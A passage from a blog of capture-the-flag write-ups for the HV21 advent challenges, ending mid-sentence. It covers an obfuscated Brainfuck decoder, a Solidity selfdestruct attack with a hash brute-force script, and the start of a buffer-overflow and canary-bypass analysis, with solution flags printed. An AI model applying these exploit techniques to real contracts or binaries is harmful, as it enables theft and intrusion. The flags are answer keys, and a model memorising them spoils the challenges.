\"+$Y+##F>~-\"\t\t\t\/*Th2N8[9o(MGz6[*e0=l[_ic2*]]nawirp%j%;.Qb;0di@;Y%h&amp;_{mI~En'D,}2Trrm\n\t\t\t\t\t\t\t   d=88J,Te *\/ \"9]&amp;&lt;A-mBq-W>'rm>S>>C+jY+Q;+x\/+zm+1~\"\n\t\t\t\t\t\t\t\/*C@G9Yw-i6-^WHr#S71p1|WbfzMa(fm:\n\t\t\t\t\t\t\t\t\t   }--b3TC4+?h%nXX, *\/ \"+@:+Ic+[}-&lt;&lt;&lt;$_{&lt;&lt;A:%[$->s=>l6+4&lt;y&lt;7Y3[!\"\n\t\t\t\t\t\t\t\t\t\/*LBI&amp;T.E7+oGpFdKw;2\n\t\t\t\t\t\t\t   MppMYs;9H8Ow0X2Rz4W_Ti*5uEta *\/ \"-?>>!h->Wz+pg\"\n\t\t\t\t\t\t\t\/*o)Mf_X(c:X.+n@Bt0oH6kz5chq(n,SRUR\n\t\t\t\t\t\t\t\t\t\t   ag9bZh=O^^hl}-sNZa#I. *\/ \"*&lt;ie]dp>F)%>['->\/>e>>9a+&lt;:&lt;$b]5)&lt;l@&lt;rg&lt;a&lt;\"\n\t\t\t\t\t\t\t\t\t\t\/*+E!ctUOo:,Pa\n     )tGM~:G;HD@Tjb:: *\/ \"G}'])n>M!2>>=[T:-&lt;z&lt;'D\" \/*Iqb)U?mCXJ^$3Re *\/\n  \"1&lt;6+^>*>>]69&lt;@=&lt;j\"\n  \"~[J7u-;ZD>W+{e&lt;(c[I->Tf-B>T\" \/*qYD7M(S_XGcvuUL~_PekkwA5#6 *\/ \"_+>r>?1>G>T>&amp;%]9B\"\t\/*\n\t\t\t\t\t\t\t\t\t    Lv8ZDr?RjGs;-J3~o0X'!I6;Rw#r!R9,X&amp;;}4 *\/ \">n_[$S#->>p^W>J#>T>?s+7:>>A]E3$&lt;\"\n\t\t\t\t\t\t\t\t\t \/*=G:4V\n\t\t\t\t\t\t\t8=!d?OR6#j3*\/ \":?4&lt;5ER&lt;Y&lt;j?l&lt;i&lt;m&lt;5Y@&lt;f9]>sV>[-\"\n\t\t\t\t\t\t\t\/*'8DM^vq#_NjYs!:jP'u}{;&amp;{(m%H~Esu\n\t\t\t\t\t\t\t   !;?bv;q{&amp;0vt8$K$=iX7r)X$1@'11ozHm~)K&amp;{zO?MV7Ni{A^?VMrm!DyyNl *\/\n  \"7e&lt;jF3&lt;j:+&amp;g>>]:\"\n  \/*{_)xTWM0gydIb*\/ \"7>sM>>{[N-xp>g>;+6D%&lt;\" \/*1Gxb4RjC]zQl:x *\/ \"&lt;Y];>eH2[a>[\/-Q@_\"\t\/*5\n\t\t\t\t\t\t\t\t   klM%MTS7-G *\/ \"&lt;->]rZZ&lt;X[b\/*-Yw>f=t+7B&lt;B]b]W=m>!6[[7-\"\n\t\t\t\t\t\t\t\t\/*t3f]*Q[;~}5t:~hG:^KO[E)&amp;Jz\n     Shorl[Y *\/ \"xs]&lt;FTl&lt;&lt;[-)}>M^+?}>o-@\" \/*{_)xTWgydIb *\/\n  \"}&lt;aGu&lt;@=]w>84[(-7'&lt;7(P+Xlf>(;\"\n  \")]+\" \/*vv*A;-]y;yZtIPqxU2owVmKGltr{B4wb94]A2le'qZ?vrr7 *\/ \">(''+B+$?++J+cz+u\"\t\/*i;U\n\t\t\t\t\t\t\t   {N^-iw80 *\/ \"+$\/[?33-Rq&lt;([k't-'>>%b++6&lt;D&lt;9o\"\n\t\t\t\t\t\t\t\/*3MxfPEPA}iUt=WlP-Nk-jf2^x=W.qG]Ww9Kx\n     #I *\/ \"r]$K>@&amp;>&amp;[&amp;-\" \/*h7W0!8!b'Z *\/ \"S9&lt;&lt;V&amp;+XO5>%~>}]@&lt;IYO\" \/*n *\/ \"]&lt;ET{[}v-Y@w>ZT\"\t\/*7\n     bi)v1)FJ! *\/ \">f>O&amp;A>+GT&lt;*&lt;q&lt;&lt;]~>)u>;]&lt;5&lt;\" \/*'_]6z*OTYR^C| *\/ \"&lt;xH_]'>%V>xnX>>b\"\t\/*C@G\n     9Yw-i6-^WHr#S71p1|WbfzMa(fm:}--b3TC4+?h%nXX, *\/ \">&amp;[6L?&lt;&lt;L&lt;&lt;hW&lt;?&lt;\"\n  \/*!1.oC(f3 *\/ \"}1\"\n  \"&lt;gQ&lt;I%S&lt;&lt;+L>>p5>{V>>N\" \/*@17zHqHDXY}@er9=-V%@Q#xM(Bsh=P-6N%&amp;TR *\/ \">&amp;*\/>>%6&amp;>;@\"\t\/*\n     _iTnvnJbvi$[6 *\/ \">p-;]j&lt;H7&lt;&lt;e&lt;x&lt;8p&lt;'&lt;0u&lt;xd&lt;6\" \/*{W8~.?_~#O7#5 *\/\n  \"&lt;[_x>3>lSh+z'\/+pB\"\n  \"++#[>98++#&amp;++(+?Y+:o:+\" \/*6U *\/ \"S+h;p&lt;!8-?oE]{w&lt;;&amp;!+jn&lt;\" \/*0zau:c$EPm *\/\n  \"$@-[s$h>E\"\n  \/*n*\/ \"i+#}!>!?+>o@-~Gz[@>b>\" \/*zk-=LkVIqd8qvO9oH]wySCxT *\/ \")L*>y=]%gL&lt;gHO[}\"\t\/*Do~i\n     4Co(MS!Di *\/ \"\/^[eL?>YZv+Z*&lt;$-TR%]>>@(6+1>@]&lt;#&amp;\" \/*4BB;I;4BMN *\/ \"&lt;KV&amp;&lt;1(&lt;&lt;~-!\"\t\/*.AdT\n\t\t\t\t\t\t   0D+}1'2Y* *\/ \"]4oT]CsH>>E&amp;>[p$}-Nv%\"\n\t\t\t\t\t\t\/*Ry.)ero|r7~OW43_QlZMn_^%u^l@5x)O({)p%jgC&amp;~{5\n\t\t\t\t\t\t   BqHdfqlbVK(5{$'6O{})p'z~vcdsy:z7Yd!@Wh9JE25!+;*OfS *\/\n  \"]OtH+>4o-o-=#[H-VG[=&lt;-Z>qw\"\n  \"++q+*[A-(Tj]]Ko%]\" \/*!I *\/ \"GQr&lt;(%D[:+AEx+!Qc+k3\" \/*)# *\/ \"+Wg+'I+++t+=+:+KK+\"\t\/*ZSRJF\n     YKk *\/ \"Y&lt;[a>*-}V%[>$A^+?z)>>\/^]\" \/*mT0+D0v *\/ \"Wak>$[L+~$[$@8&lt;^k+YI?>24u-\"\t\/*A_AveOM{\n     5i~$OIQ *\/ \"(Sk]9>odv+{>>uIH]j~&lt;H&lt;1D$&lt;&lt;8:\" \/*B]NBoj~k *\/ \"&lt;-T}F]PD>SP\/>[&lt;@K+C>-)I\"\t\/*e\n   *Ii,8zF5-WU08d*\/ \":]x>[{-n)G[8-&lt;w#&lt;M[(-*}]V>^:*>7]*\" \/*|6Y} *\/\n  \"&lt;o@E&lt;a[n;c&lt;=&lt;#->x>$\"\n  \"1-#Z]FC^>s>({L]X&lt;\/I&lt;6Uk[?&lt;j\"\t\/*u~'=sq!L0XoM!d~bojCFsx7l~){VxF}Y:viR=7MM2!%K5!T63\n\t\t\t\t\t\t\t\t\t\t   ^1pT(ja4!3Kx?z4Eh=E_Ra:'dvYBs4'@Arb *\/ \"&lt;+a{m>3op>-GR]7]y&lt;;5[(-p]S&lt;cH.\"\n\t\t\t\t\t\t\t\t\t\t\/*Q,qTG32 *\/\n  \"'[8ZR-Rz9]b&lt;TZ*-;:,j+\" \/*_iTnvnJbvi$[6*\/ \"S]?++:A+q((+MS+C([O\"\n  \/*B]Nuoj~k *\/ \"#>)+W\"\n  \"+eL+w&amp;+$+%r\" \/*{W8~.?_~#O7#5 *\/ \"W+CUW+++{>J$O+;Y@++v#\" \/*0zau:c$EPm *\/ \"m+++!0H+*\"\t\/*\n     6U *\/ \"xr+n}$++eE++m#+(k}++\" \/*#]UMND&amp;x#isa?ha@i!ofa5+465a...476'}Yc@ *\/\n  \"&amp;++)_+9Gh+\"\n  \"Rg+s}+)&amp;P+b+\" \/*ob+W^Yl~lLu_&amp;X{ssO4\"- *\/ \"=+q+Bx&lt;K2&lt;-$B]\" \/*c;EB*^9'j *\/\n  \">(&amp;y.}%k>@\"\n  \".UZ[2[-]s\" \/*ys5P.ow5z$TA~D?3E[SnjF9G\"'x5$J,yC66&amp;vdjhdd%!I+mz *\/ \"=_&lt;]+&amp;#+l#++\"\t\/*e\n     0m=g *\/ \"*+pq+ed\" \/*rt#|Ex^fW *\/ \"+}+)\/++y.o\"\t\/*w;GPA++tv+x+=>+(pM+Yy_+h+92F9G\"'c#x5$J\n\t\t\t     ,3_y&lt;I%_M&lt;a *\/ \"TC[c#7-]W'\";\n\t\t\t  \/*-4Tugi5DA;?#\"R(@yBuxR*\/\nI (main) ()\n{\n  P (69);\t\t\t\/*?LcsZnTxv7^\n\t\t\t\t *\/\n  P (11 * \/*c;EB*^9'j *\/ 10);\n  I (K) \/*ob+W^Yl~lLu_&amp;X{ssO4\"- *\/  = (1 &lt;&lt; 6) + 2, L = (\t\/*4I'04h5D|_+3\n\t\t\t\t\t\t\t\t   bCM%6[&amp;[?X(N%e#[rhQI:UdJg *\/\n\t\t\t\t\t\t\t  4 &lt;&lt; 4) + 6;\n  P (58 * 2);\t\t\t\/*e0m=g *\/\n  P (101);\n  P ( \/*@Hc#=; *\/ 114);;\n  P (1\n\/*nGe5.6'*\/  &lt;&lt; 5);\n  P (107) \/*H2}\"jhB=g2N.?aS *\/ ;\n  P (101);\n  N (H) * c = b;\n  P (11\t\t\t\t\/*w=Pc4sIz2~BA;k)o\n\t\t\t\t *\/  * 11);\n  P (58 \/*?uK[ *\/ );\n  P (2 \/*>> *\/  &lt;&lt; 4);\n  H \/*j!jS *\/ k = \/*S1T% *\/ (H) G ();\n  I (i), s = 1 &lt;&lt; 15, p = 0;\n  U (H) m[1 &lt;&lt; 15] \/*@5&amp;o%OHT]5o1aDNsgiS|x]G:+^ *\/  =\n  {\n  0};\n  F (k != K \/*xskgVsQ.I]?FI]=b *\/  || G () != L)\n    0x90;\/\/R (2);\n  K = 0x34;\n  k = (H) G ();\n  F (k \/*_^%u^l@5HdfqlbVK(*\/  != K || G () != 58 * 2) 0x90;\/\/R (2);\n  k = (H) G ();\n  F\t\t\t\t\/*n_#\n       @j;2)$b *\/ (k != 104 || G () != 16 * \/*l3o_{Dl^%Z^h *\/ 5 + 21) 0x90;\/\/R (2);\n  k = ( \/*fr?BI1V9'~{?Ko *\/ H) G ();\n  F (k != 0x57 || G () != 4 * 25 + 5 \/*Mc0%{OfEl'%FL~);?;)l *\/ )0x90;\/\/R (2);\n  k = (H) G ();\n  F (k != 0x4E || G () != 36) 0x90;\/\/R (2);\n  k = (H) G ();\n  L = 105;\n  F (k != 82 || G () != L) 0x90;\/\/R (2);\n  k = (H) G ();\n  F (k != 103 || G () != k + 1) 0x90;\/\/R (2);\n  k = (H) G ();\n  F (k != 7 * 16 + 4 || G () != (2 &lt;&lt; 5) - 1) 0x90;\/\/R (2);\n  W (*c != 0) \/*1+GSg7D+r4SgGh+ *\/\n  {\n    S (*(c++))\n    {\n      C (43)++ m[p];\t\t\/*Qe_nbD:7]bO~l *\/\n      B;\n      C (44) m[p] = *d != 0 ? *(d++) : 0;\n      B;\n      C (45)-- m[p];\t\t\/*f% *\/\n      B;\n      C (46) P (m[p]);\n      B;\n      C (60) p = (p + s - 1) % s;\n      B;\n      C (62) p = (p + 1) % s;\t\/*ys5P.ow5z$F9G\"'x5$J,yC66&amp;vI+mz *\/\n      B;\n      C (91) F (!m[p])\n      {\n\ti = 0;\n\tW\t\t\t\/*Q.4UI339&amp;#yPNH|ldo*giA;?#\"R(@7|Eklhk!.)Ny:@UKg6w~-vm?HCy{oicbwuO\n\t\t\t\t   A1Ki^;=45SS@ *\/ (1)\n\t{\n\t  F (*c == 0) R (1);\n\t  F (*(c++) != 93 || --i >= 0)\n\t  {\n\t    F (*(c - 1) == 91)++ i;\n\t  }\n\t  E (B);\n\t}\n      }\n      B;\n      C (93) i = 0;\n      --c;\n      W (1)\n      {\n\tF (c &lt; b) R (1);\n\tF (*c\t\t\t\/*rt#|Exchjw6AcX1HkOsP~S&amp;$&amp;mazkig1,\"g;Di2GjM;=2\n\t\t\t\t   W7;_=JhX$i18J3cg]]6FQKmi(|Ok^fW *\/  != 91 || --i > 0)\n\t{\n\t  F (*(c--) == 93)++ i;\n\t}\n\tE (B);\n      }\n      B;\n    }\n  }\n  R (0);\n}\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-50-1024x597.png\" alt=\"\" class=\"wp-image-1775\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{-HidDeN-bRaiNF-Ck-dEcoDer-}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.13] Super Smart Santa<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"818\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25.png\" alt=\"\" class=\"wp-image-1726\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25.png 818w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25-768x109.png 768w\" sizes=\"auto, (max-width: 818px) 100vw, 818px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>kuyaya<\/em>. Super smart indeed!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa wanted to be modern, so he asked his elves to transfer his gift contracts to&nbsp;<em>Solidity<\/em>. Did they do well?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Complete the contract! Meaning: set&nbsp;<code>isComplete<\/code>&nbsp;to&nbsp;<code>true<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hint<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Santa is using the Ropsten Testnet so you don&#8217;t become poor \ud83d\ude09<\/li>\n\n\n\n<li>To interact with the contract, Santa recommends using&nbsp;<em>Remix<\/em>&nbsp;&amp;&nbsp;<em>Metamask<\/em><\/li>\n\n\n\n<li>Be sure to set the environment to&nbsp;<em>Injected Web3<\/em><\/li>\n\n\n\n<li>&#8220;At Address&#8221; in&nbsp;<em>Remix<\/em>&nbsp;is a clickable button, you use it to interact with a contract.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1018\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-1018x1024.png\" alt=\"\" class=\"wp-image-1727\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-1018x1024.png 1018w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-298x300.png 298w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-150x150.png 150w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-768x772.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-1527x1536.png 1527w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26.png 1786w\" sizes=\"auto, (max-width: 1018px) 100vw, 1018px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>A Blockchain challenge, very nice! To solve this challenge I worked with the <a rel=\"noreferrer noopener\" href=\"https:\/\/remix.ethereum.org\/\" target=\"_blank\">remix<\/a> application and the <a rel=\"noreferrer noopener\" href=\"https:\/\/metamask.io\/\" target=\"_blank\">Metamask<\/a> wallet. On the website of the challenge we can see the Solidity code of the running contract and we can directly deploy the smart contract from there.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pragma solidity 0.4.22;\ncontract Santa {\n\tuint24 a;\n\tbytes32 b = 0x0619c10213c814eba28106f6c2472c5853b55a7c25855da514b806efc1128e55;\n\tbool public isComplete;\n\tbool c;\n\tuint256 d;\n\tconstructor() public payable {\n\t\trequire(msg.value == 0.0000000000000001 ether);\n\t\td = msg.value;\n\t}\n\tfunction e() public {\n\t\tif (keccak256(a) == b){\n\t\t\tisComplete = true;\n\t\t}\n\t}\n\tfunction f(int24 g) public{\n\t\trequire(c);\n\t\ta = uint24((0xdeadbeef) &lt;&lt;- (-31337) % 1337 >> (188495400 \/ 314159)) + uint24(g);\n\t}\n\tfunction h() public {\n\t\tuint256 i = d - address(this).balance;\n\t\trequire(i > 0);\n\t\tc = true;\n\t}\n}<\/pre>\n\n\n\n<p>The goal of the challenge is to interact with the smart contract and set the isComplete flag to true. Apparently we need to run the function h(), f() and then call e() to set the isComplete flag.<\/p>\n\n\n\n<p>The first problem is, that we cannot interact with the contract, as there is no Ether stored in the contract. I solved this issue by creating my own smart contract, self-destructing this contract and send the remaining ether to the target contract of the challenge. Don&#8217;t forget to deploy your own contract with enough Ether in it, otherwise it will not work. This attack is documented on this website: <a rel=\"noreferrer noopener\" href=\"https:\/\/solidity-by-example.org\/hacks\/self-destruct\/\" target=\"_blank\">https:\/\/solidity-by-example.org\/hacks\/self-destruct\/<\/a>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pragma solidity ^0.8.10;\ncontract Attack {\n    uint256 d;\n    constructor() public payable {\n\t\td = msg.value;\n\t}\n    function attack() public payable {\n        \/\/ cast address to payable\n        address payable addr = payable(address(0xA15b278b7D804a0eda1a726Ba96f8688CDbC8E01));\n        selfdestruct(addr);\n    }\n}<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-52-1024x645.png\" alt=\"\" class=\"wp-image-1779\"\/><\/figure>\n\n\n\n<p>Now we have enough Ether on the target smart contract to execute all the functions. First we need to figure out what parameter to send to the function f(), in order to get the right keccak256() hash for &#8220;a&#8221;: <\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0x0619c10213c814eba28106f6c2472c5853b55a7c25855da514b806efc1128e55\"<\/pre>\n\n\n\n<p>I wrote a Python program to calculate the right value for f():<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nfrom Crypto.Hash import keccak\nimport binascii\ncorrect_hash = hex(int(0x0619c10213c814eba28106f6c2472c5853b55a7c25855da514b806efc1128e55))\ndef f(g):\n\t#this just calculates +228022 ?\n\t#a = int(int(0xdeadbeef) &lt;&lt;- (-31337) % 1337 >> int(188495400 \/ 314159)) + int(g)\n\ta = g + 228022\n\t#convert signed integer to hex\n\ta = hex(a &amp; 0xffffff)[2:]\n\t# ugly\n\tif not ((len(a) % 2) == 0):\n\t\ta = \"0\"+a\n\ta = binascii.unhexlify(a)\n\treturn hex(int(keccak.new(data=a, digest_bits=256).hexdigest(), 16))\nx = f(-2406872)\nif x == correct_hash:\n\tprint(\"[!] Correct number found: \" + str(x))\nx = -2406800\nwhile x > -2500000:\n\tres = f(x)\n\tprint(\"[+] Trying: \" + str(x))\n\tif res == correct_hash:\n\t\tprint(\"[!] Correct number found: \" + str(x))\n\t\tbreak\n\tx -= 1<\/pre>\n\n\n\n<p>The Python script returns &#8220;-2406872&#8221; as the correct parameter for f(). Finally, we can call the functions in the right order (h(), f(-2406872), e()) and get the flag. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-53-1024x689.png\" alt=\"\" class=\"wp-image-1780\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-54-1024x234.png\" alt=\"\" class=\"wp-image-1781\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{sm4rt-&gt;sm4rter-&gt;y0u}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.14] Santa&#8217;s Wish Service<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"820\" height=\"126\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27.png\" alt=\"\" class=\"wp-image-1728\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27.png 820w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27-300x46.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27-768x118.png 768w\" sizes=\"auto, (max-width: 820px) 100vw, 820px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>sm4sh1t<\/em>. Best wishes!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa&#8217;s elves attended a programming course. With their new skills they started implementing a service which can be used by everyone to hand in their Christmas wishes. The elves don&#8217;t have any experience in such tasks, so they are hoping that nobody makes their heart bleed.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you break the service and get their secret?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Resources<\/h2>\n\n\n\n<p>You&#8217;ll probably need&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/a467b097-b352-4f35-817b-8fa78dbfd830.zip\" target=\"_blank\" rel=\"noreferrer noopener\">these files<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Binary exploitation at day 14, this felt way too hard for a medium challenge&#8230; I really like solving these kind of challenges, although it is super hard for me because I lack practice. Thus, I am even happier to have solved this challenge in time. <\/p>\n\n\n\n<p>I tackled this challenge using <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/longld\/peda\" target=\"_blank\">PEDA in gdb<\/a>, <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/Gallopsled\/pwntools#readme\" target=\"_blank\">PwnTools<\/a> for Python, <a rel=\"noreferrer noopener\" href=\"https:\/\/ghidra-sre.org\/\" target=\"_blank\">Ghidra<\/a> for disassembling and <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/sashs\/Ropper\" target=\"_blank\">ropper<\/a> to find the rop gadgets. Moreover, the following resources did help me a lot!<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/\" target=\"_blank\">https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/stacklikemind.io\/ret2libc-aslr\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/stacklikemind.io\/ret2libc-aslr<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/mdanilor.github.io\/posts\/memory-protections\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/mdanilor.github.io\/posts\/memory-protections\/<\/a><\/li>\n<\/ul>\n\n\n\n<p>The first thing I did, was to analyze the binary file itself.. And poah, almost all protection mechanisms are enabled. The libc.so of the server is provided too, this means that most likely ASLR is enabled on the server. We have a 64 bit Linux ELF binary, with the following protection mechanism enabled:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"582\" height=\"194\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-55.png\" alt=\"\" class=\"wp-image-1784\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-55.png 582w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-55-300x100.png 300w\" sizes=\"auto, (max-width: 582px) 100vw, 582px\" \/><\/figure>\n\n\n\n<p>Program flow:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"393\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-1024x393.png\" alt=\"\" class=\"wp-image-1788\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-1024x393.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-300x115.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-768x295.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-1536x590.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-2048x786.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Next, I took a look at the binary file in Ghidra:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"744\" height=\"588\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-56.png\" alt=\"\" class=\"wp-image-1785\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-56.png 744w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-56-300x237.png 300w\" sizes=\"auto, (max-width: 744px) 100vw, 744px\" \/><\/figure>\n\n\n\n<p>We can see on line 9, that the variable &#8220;local_d8&#8221; is an array with the length of 200 (<strong>decimal<\/strong>). On line 17 we have the selection for the menu, on line 20 we read the amount of wishes. <\/p>\n\n\n\n<p>Line 23 reads 0x200 (<strong>hexadecimal<\/strong> !) to the variable &#8220;local_d8&#8221;! We initialized the variable with 200 decimal and now we can write 0x200, which is 512 in decimal, to the array. This means we can overflow the variable &#8220;local_d8&#8221; by 312 bytes! This is the buffer overflow of the program.<\/p>\n\n\n\n<p>On line 25 there is a write of the variable &#8220;local_d8&#8221; to the output window, the size of bytes which will be written however is specified in the variable &#8220;local_da&#8221;. Exactly, this comes from our input &#8220;amount of wishes&#8221;. Which means, that we can specify a high amount of wishes and only input a few characters to the input of wishes and get allocated memory in return. In addition to the buffer overflow, we have a memory leak in the program. Perfect starting point for circumventing the protection mechanisms in place! <\/p>\n\n\n\n<p>Let&#8217;s try out both errors in the program. Buffer overflow:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"205\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-1024x205.png\" alt=\"\" class=\"wp-image-1789\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-1024x205.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-300x60.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-768x154.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-1536x308.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-2048x410.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Memory leak:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"129\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-1024x129.png\" alt=\"\" class=\"wp-image-1790\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-1024x129.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-300x38.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-768x96.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-1536x193.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-2048x257.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Step 1 &#8211; Circumvent stack canary<\/h3>\n\n\n\n<p>Main tutorial used: <a href=\"https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/<\/a><\/p>\n\n\n\n<p>The stack canary is written on the stack between the variables and the instruction pointer. If we happen to find a buffer overflow and overwrite the instruction pointer the stack canary will be overwritten too. The program crashes with &#8220;Stack smashing detected&#8221;, exactly as shown in the print screen above. To circumvent this, we need to read the stack canary with the memory leak and write it back, when we overflow the buffer. In a 64 bit ELF binary the stack canary is 8 bytes long and typically starts with 0x00. Let&#8217;s see if we can find the canary with the hexdump() function of pwntools:<\/p>\n\n\n\n<pre 